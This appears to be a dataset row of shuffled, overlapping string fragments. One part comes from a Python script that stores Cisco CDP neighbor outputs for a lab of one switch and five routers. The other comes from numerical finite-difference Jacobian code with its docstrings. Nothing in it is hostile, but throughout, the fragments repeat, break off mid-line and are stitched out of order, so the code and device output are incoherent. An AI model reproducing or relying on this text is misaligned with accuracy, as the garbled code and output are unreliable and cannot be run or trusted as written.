IOS Software, C880 Software (C880DATA-UNIVERSALK9-M),", "R3 Entry address(es): IP address: 10.1.1.3 Platform: Cisco 881, Capabilities:", "Fas 0/11 153 R S I 881 Fas 1 R2", "- Source Route Bridge S - Switch, H - Host,", "S I 881 Fas 1 R3 Fas 0/13 129 R", "''' R1>show cdp neighbors detail ------------------------- Device ID: SW1 Entry", "881 Fas 1 R3 Fas 0/13 129 R S I", "Management Domain: '' Native VLAN: 1 Duplex: full ''' r4_show_cdp_neighbors", "address(es): IP address: 10.1.1.2 Platform: Cisco 881, Capabilities: Router Switch", "address(es): -------------------------- Device ID: R4 Entry address(es): IP address: 10.1.1.4", "1 R5 Fas 0/15 144 R S I 881 Fas", "1 Duplex: full Management address(es): ''' r1_show_cdp_neighbors = ''' R1>show", "Duplex: full Management address(es): -------------------------- Device ID: R3 Entry address(es):", "Management Domain: '' Native VLAN: 1 Duplex: full ''' r2_show_cdp_neighbors", "RELEASE SOFTWARE (fc1) Copyright (c) 1986-2006 by cisco Systems, Inc.", "payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000 VTP Management Domain: '' Native VLAN: 1", "150 S I WS-C2950- Fas 0/13 ''' r3_show_cdp_neighbors_detail = '''", "ID (outgoing port): FastEthernet0/11 Holdtime : 145 sec Version :", "= ''' R3>show cdp neighbors detail ------------------------- Device ID: SW1", "Fas 0/13 ''' r3_show_cdp_neighbors_detail = ''' R3>show cdp neighbors detail", "1 Duplex: full Management address(es): -------------------------- Device ID: R2 Entry", "WS-C2950- Fas 0/14 ''' r4_show_cdp_neighbors_detail = ''' R4>show cdp neighbors", "129 R S I 881 Fas 1 R4 Fas 0/14", "173 sec Version : Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M),", "Switch IGMP Interface: FastEthernet0/12, Port ID (outgoing port): FastEthernet1 Holdtime:", "Management address(es): -------------------------- Device ID: R4 Entry address(es): IP address:", "r - Repeater, P - Phone Device ID Local Intrfce", "Device ID: R4 Entry address(es): IP address: 10.1.1.4 Platform: Cisco", "Operating System Software IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a,", "''' r3_show_cdp_neighbors = ''' R3>show cdp neighbors Capability Codes: R", "FastEthernet0/14 Holdtime : 145 sec Version : Cisco Internetwork Operating", "B - Source Route Bridge S - Switch, H -", 
"Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/15, Port ID", "FastEthernet0/13, Port ID (outgoing port): FastEthernet1 Holdtime: 129 sec Version", "ID: SW1 Entry address(es): IP address: 10.1.1.22 Platform: cisco WS-C2950-24,", "1 Duplex: full Management address(es): -------------------------- Device ID: R4 Entry", "15:16 by weiliu advertisement version: 2 Protocol Hello: OUI=0x00000C, Protocol", "1986-2006 by cisco Systems, Inc. Compiled Fri 28-Jul-06 15:16 by", "Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/15 Holdtime", "Support: http://www.cisco.com/techsupport Copyright (c) 1986-2010 by Cisco Systems, Inc. Compiled", "FastEthernet0/14, Port ID (outgoing port): FastEthernet1 Holdtime: 173 sec Version", "Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2010 by Cisco Systems, Inc.", "Entry address(es): IP address: 10.1.1.5 Platform: Cisco 881, Capabilities: Router", "1 150 S I WS-C2950- Fas 0/11 ''' r1_show_cdp_neighbors_detail =", "Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE", "r5_show_cdp_neighbors_detail = ''' R5>show cdp neighbors detail ------------------------- Device ID:", "Codes: R - Router, T - Trans Bridge, B -", "'' Native VLAN: 1 Duplex: full ''' r4_show_cdp_neighbors = '''", "IGMP Interface: FastEthernet0/14, Port ID (outgoing port): FastEthernet1 Holdtime: 173", "Fas 1 150 S I WS-C2950- Fas 0/14 ''' r4_show_cdp_neighbors_detail", "10.1.1.3 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/13,", "Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/14 Holdtime : 145", "Capability Platform Port ID SW1 Fas 1 150 S I", "(outgoing port): FastEthernet0/14 Holdtime : 145 sec Version : Cisco", "R1 Fas 0/11 153 R S I 881 Fas 1", "ID (outgoing port): FastEthernet1 Holdtime: 173 sec Version : Cisco", "''' R3>show cdp neighbors Capability Codes: R - Router, T", "153 R S I 881 Fas 1 R2 Fas 0/12", "SOFTWARE (fc1) Copyright (c) 1986-2006 by cisco Systems, Inc. Compiled", "29-Oct-10 00:02 by prod_rel_team advertisement version: 2 VTP Management Domain:", "Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/12, Port", "R2>show cdp neighbors detail ------------------------- Device ID: SW1 Entry address(es):", "R5 Fas 0/15 144 R S I 881 Fas 1", "VLAN: 1 Duplex: full ''' r4_show_cdp_neighbors = ''' R4>show cdp", "1 Duplex: full Management address(es): -------------------------- Device ID: R5 Entry", "(c) 1986-2006 by cisco Systems, Inc. Compiled Fri 28-Jul-06 15:16", "http://www.cisco.com/techsupport Copyright (c) 1986-2010 by Cisco Systems, Inc. Compiled Fri", "2 Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000 VTP", "ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000 VTP Management Domain: '' Native VLAN:", "Entry address(es): IP address: 10.1.1.3 Platform: Cisco 881, Capabilities: Router", "S I WS-C2950- Fas 0/15 ''' r5_show_cdp_neighbors_detail = ''' R5>show", "full ''' r4_show_cdp_neighbors = ''' R4>show cdp neighbors Capability Codes:", "Systems, Inc. 
Compiled Fri 29-Oct-10 00:02 by prod_rel_team advertisement version:", "0/14 ''' r4_show_cdp_neighbors_detail = ''' R4>show cdp neighbors detail -------------------------", "r3_show_cdp_neighbors = ''' R3>show cdp neighbors Capability Codes: R -", "Fas 0/14 173 R S I 881 Fas 1 R5", "S I 881 Fas 1 R4 Fas 0/14 173 R", "by weiliu advertisement version: 2 Protocol Hello: OUI=0x00000C, Protocol ID=0x0112;", "Fri 29-Oct-10 00:02 by prod_rel_team advertisement version: 2 VTP Management", "I WS-C2950- Fas 0/14 ''' r4_show_cdp_neighbors_detail = ''' R4>show cdp", "WS-C2950- Fas 0/13 ''' r3_show_cdp_neighbors_detail = ''' R3>show cdp neighbors", "Inc. Compiled Fri 29-Oct-10 00:02 by prod_rel_team advertisement version: 2", "Fas 1 150 S I WS-C2950- Fas 0/11 ''' r1_show_cdp_neighbors_detail", "r1_show_cdp_neighbors_detail = ''' R1>show cdp neighbors detail ------------------------- Device ID:", "''' r4_show_cdp_neighbors = ''' R4>show cdp neighbors Capability Codes: R", "R5 Entry address(es): IP address: 10.1.1.5 Platform: Cisco 881, Capabilities:", "0/13 129 R S I 881 Fas 1 R4 Fas", "address(es): IP address: 10.1.1.4 Platform: Cisco 881, Capabilities: Router Switch", "Port ID R1 Fas 0/11 153 R S I 881", "ID (outgoing port): FastEthernet0/14 Holdtime : 145 sec Version :", "Capabilities: Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/12", "R3>show cdp neighbors detail ------------------------- Device ID: SW1 Entry address(es):", "Entry address(es): IP address: 10.1.1.2 Platform: Cisco 881, Capabilities: Router", ": Cisco Internetwork Operating System Software IOS (tm) C2950 Software", "Capabilities: Switch IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/15", "''' R2>show cdp neighbors detail ------------------------- Device ID: SW1 Entry", "cisco WS-C2950-24, Capabilities: Switch IGMP Interface: FastEthernet1, Port ID (outgoing", "FastEthernet0/11 Holdtime : 145 sec Version : Cisco Internetwork Operating", "ID: R4 Entry address(es): IP address: 10.1.1.4 Platform: Cisco 881,", "Fas 1 ''' sw1_show_cdp_neighbors_detail = ''' SW1> show cdp neighbors", "1 R4 Fas 0/14 173 R S I 881 Fas", "SW1 Fas 1 150 S I WS-C2950- Fas 0/11 '''", "Native VLAN: 1 Duplex: full ''' r4_show_cdp_neighbors = ''' R4>show", "R2>show cdp neighbors Capability Codes: R - Router, T -", "Switch IGMP Interface: FastEthernet0/15, Port ID (outgoing port): FastEthernet1 Holdtime:", "OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000 VTP Management Domain: ''", "Fas 0/15 ''' r5_show_cdp_neighbors_detail = ''' R5>show cdp neighbors detail", "1 R3 Fas 0/13 129 R S I 881 Fas", "''' r4_show_cdp_neighbors_detail = ''' R4>show cdp neighbors detail ------------------------- Device", "I WS-C2950- Fas 0/11 ''' r1_show_cdp_neighbors_detail = ''' R1>show cdp", "Router Switch IGMP Interface: FastEthernet0/14, Port ID (outgoing port): FastEthernet1", "SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2010 by Cisco", "= ''' R2>show cdp neighbors detail ------------------------- Device ID: SW1", "R S I 881 Fas 1 R4 Fas 0/14 173", "Duplex: full Management address(es): -------------------------- Device ID: R5 Entry address(es):", "full Management address(es): ''' r1_show_cdp_neighbors = ''' R1>show cdp neighbors", "ID: R2 Entry address(es): IP address: 10.1.1.2 Platform: Cisco 881,", "- Host, I - IGMP, r - Repeater Device ID", "IGMP, r - Repeater Device ID Local Intrfce Holdtme Capability", "(fc1) Copyright (c) 
1986-2006 by cisco Systems, Inc. Compiled Fri", "Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/14, Port", "FastEthernet1, Port ID (outgoing port): FastEthernet0/15 Holdtime : 145 sec", "881, Capabilities: Router Switch IGMP Interface: FastEthernet0/14, Port ID (outgoing", "= ''' R5>show cdp neighbors Capability Codes: R - Router,", "1986-2010 by Cisco Systems, Inc. Compiled Fri 29-Oct-10 00:02 by", "(outgoing port): FastEthernet1 Holdtime: 173 sec Version : Cisco IOS", "VTP Management Domain: '' Native VLAN: 1 Duplex: full '''", "FastEthernet1, Port ID (outgoing port): FastEthernet0/13 Holdtime : 145 sec", "= ''' R3>show cdp neighbors Capability Codes: R - Router,", "Duplex: full Management address(es): ''' r1_show_cdp_neighbors = ''' R1>show cdp", "Fas 1 R5 Fas 0/15 144 R S I 881", "R S I 881 Fas 1 ''' sw1_show_cdp_neighbors_detail = '''", "Intrfce Holdtme Capability Platform Port ID R1 Fas 0/11 153", "I 881 Fas 1 R3 Fas 0/13 129 R S", "------------------------- Device ID: SW1 Entry address(es): IP address: 10.1.1.22 Platform:", "''' R1>show cdp neighbors Capability Codes: R - Router, T", "#!/usr/bin/env python sw1_show_cdp_neighbors = ''' SW1>show cdp neighbors Capability Codes:", "Duplex: full ''' r4_show_cdp_neighbors = ''' R4>show cdp neighbors Capability", "R4>show cdp neighbors Capability Codes: R - Router, T -", "full ''' r5_show_cdp_neighbors = ''' R5>show cdp neighbors Capability Codes:", "Device ID Local Intrfce Holdtme Capability Platform Port ID R1", "Duplex: full Management address(es): -------------------------- Device ID: R4 Entry address(es):", "S I WS-C2950- Fas 0/13 ''' r3_show_cdp_neighbors_detail = ''' R3>show", "10.1.1.2 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/12,", "full Management address(es): -------------------------- Device ID: R2 Entry address(es): IP", "IGMP Interface: FastEthernet0/12, Port ID (outgoing port): FastEthernet1 Holdtime: 123", "S I 881 Fas 1 R5 Fas 0/15 144 R", "123 sec Version : Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M),", "neighbors detail -------------------------- Device ID: R1 Entry address(es): IP address:", "Domain: '' Native VLAN: 1 Duplex: full Management address(es): '''", "Device ID: R5 Entry address(es): IP address: 10.1.1.5 Platform: Cisco", "150 S I WS-C2950- Fas 0/11 ''' r1_show_cdp_neighbors_detail = '''", "Port ID (outgoing port): FastEthernet0/12 Holdtime : 145 sec Version", "Software IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE", "Holdtme Capability Platform Port ID R1 Fas 0/11 153 R", "WS-C2950- Fas 0/11 ''' r1_show_cdp_neighbors_detail = ''' R1>show cdp neighbors", "881, Capabilities: Router Switch IGMP Interface: FastEthernet0/11, Port ID (outgoing", "-------------------------- Device ID: R3 Entry address(es): IP address: 10.1.1.3 Platform:", "R4>show cdp neighbors detail ------------------------- Device ID: SW1 Entry address(es):", "SW1 Fas 1 150 S I WS-C2950- Fas 0/13 '''", "IP address: 10.1.1.4 Platform: Cisco 881, Capabilities: Router Switch IGMP", "Management address(es): ''' r1_show_cdp_neighbors = ''' R1>show cdp neighbors Capability", "144 R S I 881 Fas 1 ''' sw1_show_cdp_neighbors_detail =", "Port ID (outgoing port): FastEthernet1 Holdtime: 153 sec Version :", "address(es): -------------------------- Device ID: R5 Entry address(es): IP address: 10.1.1.5", "ID: R1 Entry address(es): IP address: 10.1.1.1 Platform: Cisco 881,", "Router Switch IGMP Interface: FastEthernet0/12, Port ID (outgoing 
port): FastEthernet1", "R1 Entry address(es): IP address: 10.1.1.1 Platform: Cisco 881, Capabilities:", "Domain: '' Native VLAN: 1 Duplex: full ''' r3_show_cdp_neighbors =", "Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/15 Holdtime : 145", "FastEthernet0/13 Holdtime : 145 sec Version : Cisco Internetwork Operating", "Device ID: R1 Entry address(es): IP address: 10.1.1.1 Platform: Cisco", "= ''' R4>show cdp neighbors Capability Codes: R - Router,", "FastEthernet1 Holdtime: 173 sec Version : Cisco IOS Software, C880", "IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1)", "Compiled Fri 29-Oct-10 00:02 by prod_rel_team advertisement version: 2 VTP", "IGMP Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/13 Holdtime :", "advertisement version: 2 Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27,", "'' Native VLAN: 1 Duplex: full ''' r5_show_cdp_neighbors = '''", "Bridge, B - Source Route Bridge S - Switch, H", "by cisco Systems, Inc. Compiled Fri 28-Jul-06 15:16 by weiliu", "len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000 VTP Management Domain: '' Native VLAN: 1 Duplex:", "I WS-C2950- Fas 0/15 ''' r5_show_cdp_neighbors_detail = ''' R5>show cdp", "Fas 1 150 S I WS-C2950- Fas 0/12 ''' r2_show_cdp_neighbors_detail", "1 Duplex: full Management address(es): -------------------------- Device ID: R3 Entry", "I 881 Fas 1 R4 Fas 0/14 173 R S", "cdp neighbors detail -------------------------- Device ID: R1 Entry address(es): IP", "sec Version : Cisco Internetwork Operating System Software IOS (tm)", "Local Intrfce Holdtme Capability Platform Port ID R1 Fas 0/11", "- IGMP, r - Repeater Device ID Local Intrfce Holdtme", "Holdtme Capability Platform Port ID SW1 Fas 1 150 S", "R S I 881 Fas 1 R3 Fas 0/13 129", "1 Duplex: full ''' r3_show_cdp_neighbors = ''' R3>show cdp neighbors", ": 145 sec Version : Cisco Internetwork Operating System Software", "''' r1_show_cdp_neighbors_detail = ''' R1>show cdp neighbors detail ------------------------- Device", "VLAN: 1 Duplex: full Management address(es): -------------------------- Device ID: R4", "ID SW1 Fas 1 150 S I WS-C2950- Fas 0/11", "Fas 1 150 S I WS-C2950- Fas 0/15 ''' r5_show_cdp_neighbors_detail", "Fas 0/15 144 R S I 881 Fas 1 '''", "10.1.1.1 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/11,", "weiliu advertisement version: 2 Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload", "IP address: 10.1.1.1 Platform: Cisco 881, Capabilities: Router Switch IGMP", "Capabilities: Router Switch IGMP Interface: FastEthernet0/15, Port ID (outgoing port):", "'' Native VLAN: 1 Duplex: full Management address(es): ''' r1_show_cdp_neighbors", "150 S I WS-C2950- Fas 0/12 ''' r2_show_cdp_neighbors_detail = '''", "FastEthernet1, Port ID (outgoing port): FastEthernet0/11 Holdtime : 145 sec", "150 S I WS-C2950- Fas 0/14 ''' r4_show_cdp_neighbors_detail = '''", "881, Capabilities: Router Switch IGMP Interface: FastEthernet0/13, Port ID (outgoing", "''' r5_show_cdp_neighbors = ''' R5>show cdp neighbors Capability Codes: R", "(outgoing port): FastEthernet1 Holdtime: 153 sec Version : Cisco IOS", "144 sec Version : Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M),", "Platform Port ID R1 Fas 0/11 153 R S I", "Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/15, Port", "0/14 173 R S I 881 Fas 1 R5 Fas", "ID: R3 Entry address(es): IP address: 10.1.1.3 Platform: Cisco 881,", "S I WS-C2950- Fas 0/11 ''' 
r1_show_cdp_neighbors_detail = ''' R1>show", "port): FastEthernet0/12 Holdtime : 145 sec Version : Cisco Internetwork", "(outgoing port): FastEthernet0/11 Holdtime : 145 sec Version : Cisco", "Duplex: full ''' r5_show_cdp_neighbors = ''' R5>show cdp neighbors Capability", "SW1 Fas 1 150 S I WS-C2950- Fas 0/12 '''", "(outgoing port): FastEthernet0/13 Holdtime : 145 sec Version : Cisco", "VLAN: 1 Duplex: full Management address(es): ''' r1_show_cdp_neighbors = '''", "FastEthernet1 Holdtime: 123 sec Version : Cisco IOS Software, C880", "address(es): -------------------------- Device ID: R3 Entry address(es): IP address: 10.1.1.3", "Fas 1 R2 Fas 0/12 123 R S I 881", "'' Native VLAN: 1 Duplex: full Management address(es): -------------------------- Device", "Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/12 Holdtime : 145", "address(es): -------------------------- Device ID: R2 Entry address(es): IP address: 10.1.1.2", "Switch IGMP Interface: FastEthernet0/11, Port ID (outgoing port): FastEthernet1 Holdtime:", "IGMP Interface: FastEthernet0/11, Port ID (outgoing port): FastEthernet1 Holdtime: 153", "''' r2_show_cdp_neighbors_detail = ''' R2>show cdp neighbors detail ------------------------- Device", "IGMP Interface: FastEthernet0/13, Port ID (outgoing port): FastEthernet1 Holdtime: 129", "= ''' R1>show cdp neighbors Capability Codes: R - Router,", "1 Duplex: full ''' r5_show_cdp_neighbors = ''' R5>show cdp neighbors", "ID (outgoing port): FastEthernet0/15 Holdtime : 145 sec Version :", "address: 10.1.1.22 Platform: cisco WS-C2950-24, Capabilities: Switch IGMP Interface: FastEthernet1,", "port): FastEthernet0/14 Holdtime : 145 sec Version : Cisco Internetwork", "address: 10.1.1.3 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface:", "(c) 1986-2010 by Cisco Systems, Inc. Compiled Fri 29-Oct-10 00:02", "Repeater, P - Phone Device ID Local Intrfce Holdtme Capability", "Version 15.0(1)M4, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c)", "I WS-C2950- Fas 0/12 ''' r2_show_cdp_neighbors_detail = ''' R2>show cdp", "full ''' r2_show_cdp_neighbors = ''' R2>show cdp neighbors Capability Codes:", "Port ID (outgoing port): FastEthernet0/14 Holdtime : 145 sec Version", "T - Trans Bridge, B - Source Route Bridge S", "Management address(es): -------------------------- Device ID: R2 Entry address(es): IP address:", "I 881 Fas 1 R5 Fas 0/15 144 R S", "IP address: 10.1.1.2 Platform: Cisco 881, Capabilities: Router Switch IGMP", "Port ID (outgoing port): FastEthernet1 Holdtime: 129 sec Version :", "= ''' R1>show cdp neighbors detail ------------------------- Device ID: SW1", "VLAN: 1 Duplex: full Management address(es): -------------------------- Device ID: R2", "0/15 ''' r5_show_cdp_neighbors_detail = ''' R5>show cdp neighbors detail -------------------------", "address: 10.1.1.2 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface:", "I 881 Fas 1 ''' sw1_show_cdp_neighbors_detail = ''' SW1> show", "'' Native VLAN: 1 Duplex: full ''' r3_show_cdp_neighbors = '''", "ID SW1 Fas 1 150 S I WS-C2950- Fas 0/14", "Fas 0/14 ''' r4_show_cdp_neighbors_detail = ''' R4>show cdp neighbors detail", "0/12 ''' r2_show_cdp_neighbors_detail = ''' R2>show cdp neighbors detail -------------------------", "Capability Codes: R - Router, T - Trans Bridge, B", "Cisco Systems, Inc. 
Compiled Fri 29-Oct-10 00:02 by prod_rel_team advertisement", "- Router, T - Trans Bridge, B - Source Route", "1 R2 Fas 0/12 123 R S I 881 Fas", "Router Switch IGMP Interface: FastEthernet0/13, Port ID (outgoing port): FastEthernet1", "S I WS-C2950- Fas 0/12 ''' r2_show_cdp_neighbors_detail = ''' R2>show", "Host, I - IGMP, r - Repeater Device ID Local", "Router Switch IGMP Interface: FastEthernet0/11, Port ID (outgoing port): FastEthernet1", "1 150 S I WS-C2950- Fas 0/15 ''' r5_show_cdp_neighbors_detail =", "cdp neighbors Capability Codes: R - Router, T - Trans", "address(es): IP address: 10.1.1.3 Platform: Cisco 881, Capabilities: Router Switch", "address: 10.1.1.4 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface:", "Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/13, Port ID", "Duplex: full Management address(es): -------------------------- Device ID: R2 Entry address(es):", "Router Switch IGMP Interface: FastEthernet0/15, Port ID (outgoing port): FastEthernet1", "R1>show cdp neighbors detail ------------------------- Device ID: SW1 Entry address(es):", "Port ID (outgoing port): FastEthernet0/13 Holdtime : 145 sec Version", "full Management address(es): -------------------------- Device ID: R3 Entry address(es): IP", "full Management address(es): -------------------------- Device ID: R5 Entry address(es): IP", "''' SW1>show cdp neighbors Capability Codes: R - Router, T", "1 ''' sw1_show_cdp_neighbors_detail = ''' SW1> show cdp neighbors detail", "- Switch, H - Host, I - IGMP, r -", "version: 2 VTP Management Domain: '' Native VLAN: 1 Duplex:", "''' r1_show_cdp_neighbors = ''' R1>show cdp neighbors Capability Codes: R", "Duplex: full ''' r2_show_cdp_neighbors = ''' R2>show cdp neighbors Capability", "Duplex: full ''' r3_show_cdp_neighbors = ''' R3>show cdp neighbors Capability", "= ''' R2>show cdp neighbors Capability Codes: R - Router,", "r2_show_cdp_neighbors_detail = ''' R2>show cdp neighbors detail ------------------------- Device ID:", "ID R1 Fas 0/11 153 R S I 881 Fas", "Port ID (outgoing port): FastEthernet1 Holdtime: 144 sec Version :", "Holdtime: 173 sec Version : Cisco IOS Software, C880 Software", "neighbors detail ------------------------- Device ID: SW1 Entry address(es): IP address:", "150 S I WS-C2950- Fas 0/15 ''' r5_show_cdp_neighbors_detail = '''", "Fri 28-Jul-06 15:16 by weiliu advertisement version: 2 Protocol Hello:", "FastEthernet0/12, Port ID (outgoing port): FastEthernet1 Holdtime: 123 sec Version", "I - IGMP, r - Repeater Device ID Local Intrfce", "Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1) Copyright (c) 1986-2006 by cisco", "Management address(es): -------------------------- Device ID: R5 Entry address(es): IP address:", "Entry address(es): IP address: 10.1.1.22 Platform: cisco WS-C2950-24, Capabilities: Switch", "Inc. 
Compiled Fri 28-Jul-06 15:16 by weiliu advertisement version: 2", "1 150 S I WS-C2950- Fas 0/12 ''' r2_show_cdp_neighbors_detail =", "ID (outgoing port): FastEthernet0/12 Holdtime : 145 sec Version :", "1 Duplex: full ''' r4_show_cdp_neighbors = ''' R4>show cdp neighbors", "0/11 ''' r1_show_cdp_neighbors_detail = ''' R1>show cdp neighbors detail -------------------------", "'' Native VLAN: 1 Duplex: full ''' r2_show_cdp_neighbors = '''", "Platform: Cisco 881, Capabilities: Router Switch IGMP Interface: FastEthernet0/11, Port", "VLAN: 1 Duplex: full Management address(es): -------------------------- Device ID: R3", "0/13 ''' r3_show_cdp_neighbors_detail = ''' R3>show cdp neighbors detail -------------------------", "r3_show_cdp_neighbors_detail = ''' R3>show cdp neighbors detail ------------------------- Device ID:", "address: 10.1.1.5 Platform: Cisco 881, Capabilities: Router Switch IGMP Interface:", "WS-C2950- Fas 0/15 ''' r5_show_cdp_neighbors_detail = ''' R5>show cdp neighbors", "Fas 0/13 129 R S I 881 Fas 1 R4", "Native VLAN: 1 Duplex: full ''' r3_show_cdp_neighbors = ''' R3>show", "address(es): ''' r1_show_cdp_neighbors = ''' R1>show cdp neighbors Capability Codes:", "port): FastEthernet1 Holdtime: 173 sec Version : Cisco IOS Software,", "Host, I - IGMP, r - Repeater, P - Phone", "881, Capabilities: Router Switch IGMP Interface: FastEthernet0/12, Port ID (outgoing", "WS-C2950- Fas 0/12 ''' r2_show_cdp_neighbors_detail = ''' R2>show cdp neighbors", "SW1 Fas 1 150 S I WS-C2950- Fas 0/15 '''", "SW1> show cdp neighbors detail -------------------------- Device ID: R1 Entry", "Trans Bridge, B - Source Route Bridge S - Switch,", "I WS-C2950- Fas 0/13 ''' r3_show_cdp_neighbors_detail = ''' R3>show cdp", "RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2010 by", "r1_show_cdp_neighbors = ''' R1>show cdp neighbors Capability Codes: R -" ]
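The row reads like input fixtures for a parsing exercise: the same topology captured once per device, in both summary and detail form. As a hypothetical companion (the function name and regex below are mine, not the course's own code), here is a sketch that pulls (device, local interface, remote port) triples out of a summary table.

# Hypothetical companion to the fixtures: extract neighbor triples
# from a "show cdp neighbors" summary table.
import re

CDP_ROW = re.compile(
    r"^(?P<device>\S+)\s+"       # Device ID, e.g. R1 or SW1
    r"(?P<local>\S+ \S+)\s+"     # Local Intrfce, e.g. "Fas 0/11"
    r"\d+\s+"                    # Holdtme
    r"(?:[RTBSHIrP] )+\s*"       # Capability codes, e.g. "R S I "
    r"(?P<platform>\S+)\s+"      # Platform, e.g. 881 or WS-C2950-
    r"(?P<remote>\S+ \S+)\s*$"   # Port ID, e.g. "Fas 1"
)

def parse_cdp_neighbors(output):
    """Return [(device, local_intf, remote_port), ...] from summary output."""
    triples = []
    for line in output.splitlines():
        m = CDP_ROW.match(line.strip())
        if m:
            triples.append((m["device"], m["local"], m["remote"]))
    return triples

# e.g. parse_cdp_neighbors(sw1_show_cdp_neighbors)
#  -> [('R1', 'Fas 0/11', 'Fas 1'), ..., ('R5', 'Fas 0/15', 'Fas 1')]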
[ "return np.max(np.abs(abs_err_data) / np.maximum(1, np.abs(J_diff_data))) else: J_diff = approx_derivative(fun, x0,", "np.atleast_1d(fun(x, *args, **kwargs)) if f.ndim > 1: raise RuntimeError(\"`fun` return", "row_indices = [] col_indices = [] fractions = [] n_groups", "'2-point': x = x0 + h_vec dx = x -", "shape. x0 : array_like of shape (n,) or float Point", "df / dx elif method == '3-point': def matvec(p): if", "greedy sequential algorithm is used to construct groups. Parameters ----------", "which we wish to estimate derivative. h : ndarray, shape", "are required. In other words '1-sided' applies to forward and", "raise ValueError(\"`scheme` must be '1-sided' or '2-sided'.\") if np.all((lb ==", "x2[mask_2] - x1[mask_2] f1 = fun(x1) f2 = fun(x2) cols,", "= x0 - (dx/2)*p x2 = x0 + (dx/2)*p f1", "sparse finite differencing [1]_. Two columns are in the same", "it is assumed to be equal to ``fun(x0)``, in this", "must have at most 1 dimension.\") lb, ub = _prepare_bounds(bounds,", "c1, c2): ... return np.array([x[0] * np.sin(c1 * x[1]), ...", "shape (n,), on the other hand when n=1 Jacobian is", "shape (n,). See Also -------- check_derivative : Check correctness of", "upper_dist[forward] / num_steps) use_one_sided[forward] = True backward = (upper_dist <", "Jacobian. i, j, _ = find(structure[:, cols]) # Restore column", "for all variables. Use it to limit the range of", "a dense array or a sparse matrix depending on `sparsity`.", "and round-off errors, see [1]_. A finite difference scheme for", "dtype=bool) else: raise ValueError(\"`scheme` must be '1-sided' or '2-sided'.\") if", "is interpreted as (structure, groups). If None (default), a standard", "ValueError(\"Bounds not supported when \" \"`as_linear_operator` is True.\") def fun_wrapped(x):", "method='3-point', rel_step=None, f0=None, bounds=(-np.inf, np.inf), sparsity=None, as_linear_operator=False, args=(), kwargs={}): \"\"\"Compute", "and <NAME>, \"On the estimation of sparse Jacobian matrices\", Journal", "ndarray, shape (n,) Lower bounds on independent variables. ub :", "Matrix of which to group columns. order : int, iterable", "variables. Defaults to no bounds. Each bound must match the", "is not called. Default is None. bounds : tuple of", "(1974), pp. 117-120. .. [3] <NAME>, \"Generation of Finite Difference", "def f(x, c1, c2): ... return np.array([x[0] * np.sin(c1 *", "= x0 - h_vecs[i] x2 = x0 + h_vecs[i] dx", "incorrect shape.\") A = A[:, order] if issparse(A): groups =", "column grouping for a given sparsity structure, use `group_columns` to", "order of columns enumeration. If int or None, a random", "row_indices.append(i) col_indices.append(j) fractions.append(df[i] / dx[j]) row_indices = np.hstack(row_indices) col_indices =", "possibly adjusted to fit into the bounds. For ``method='3-point'`` the", "-1 forward = (upper_dist >= lower_dist) & ~fitting h_adjusted[forward] =", "center schemes. 
lb : ndarray, shape (n,) Lower bounds on", "form m-by-n matrix called the Jacobian, where an element (i,", "derivatives form m-by-n matrix called the Jacobian, where an element", ">>> approx_derivative(f, x0, args=(1, 2)) array([[ 1., 0.], [-1., 0.]])", "x0): lb, ub = [np.asarray(b, dtype=float) for b in bounds]", "h_vec[mask_1] x2[mask_1] += 2 * h_vec[mask_1] mask_2 = ~use_one_sided &", "x2 = x0 + (dx/2)*p f1 = fun(x1) f2 =", "method == 'cs': f1 = fun(x0 + h_vecs[i]*1.j) df =", "& (ub == np.inf)): return h, use_one_sided h_total = h", "shape (n,) or float Point at which to estimate the", "In all cases np.atleast_2d can be called to get 2-D", "J = coo_matrix((fractions, (row_indices, col_indices)), shape=(m, n)) return csr_matrix(J) def", "else: raise ValueError(\"`scheme` must be '1-sided' or '2-sided'.\") if np.all((lb", "returned with a shape (m, 1). Our motivation is the", "... >>> def jac(x, c1, c2): ... return np.array([ ...", "= cols[j] mask = use_one_sided[j] df = np.empty(m) rows =", "bounds. For ``method='3-point'`` the sign of `h` is ignored. 